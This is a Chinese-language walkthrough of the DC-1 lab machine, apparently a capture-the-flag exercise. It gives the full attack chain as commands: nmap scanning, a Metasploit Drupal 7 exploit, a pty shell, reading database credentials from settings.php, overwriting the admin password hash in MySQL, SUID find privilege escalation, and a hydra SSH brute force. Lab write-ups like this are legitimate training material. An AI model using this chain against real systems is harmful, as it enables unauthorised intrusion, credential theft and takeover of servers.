第一步:输入ifconfig,查看网段所在的主机,可以看到DC-1的IP地址
IP地址为192.168.43.128
第二步:寻找靶机的真实IP
nmap -sP xxx.xxx.xx.xxx/24
第三步:使用nmap对DC-1进行扫描
nmap -A -p- -v 192.168.43.129
第四步:访问web网点
第五步:找到一个电信drupal,根据nmap可知当前运行的是Drupal 7的CMS
Searchsploit drupal 7
第六步:输入msfconsole
第七步:可以用MSF渗透
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
我们先进入MSF控制台搜索drupal模块,然后进入MSF控制台msfdb run
再去搜索drupal模块search drupal
第八步:输入use 1
第九步:设置靶机IP运行msf
set rhosts 192.168.43.129
Run
第十步:执行whoami
输入shell
Whoami
第十一步:发现是www-data权限
所以要进入home目录,发现flag4.txt文件,提示我们需要提升权限
第十二步:使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
第十三步:发现flag1文件
查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件
第十四步:发现flag2
Drupal的默认配置文件为
/var/www/sites/default/settings.php
查看文件内容
输入cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件
我们先进入数据库查看
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
第十五步: 我们先进入数据库查看
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
查看数据库,切换到drupaldb数据库
第十六步: 查看查找默认的Drupal user 表
select * from users;
我们可以发现admin信息
第十七步:输入quit;
站点路径下执行
php scripts/password-hash.sh 123
第十八步:
然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段进行替换
update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";
十九步:登录站点
访问站点
进行登录,密码是之前我们自己替换的,账号是admin
admin
123
成功登录
使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null
发现find命令
使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
进入john目录cd /usr/share/john
hydra -l flag4 -P password.lst ssh://192.168.43.129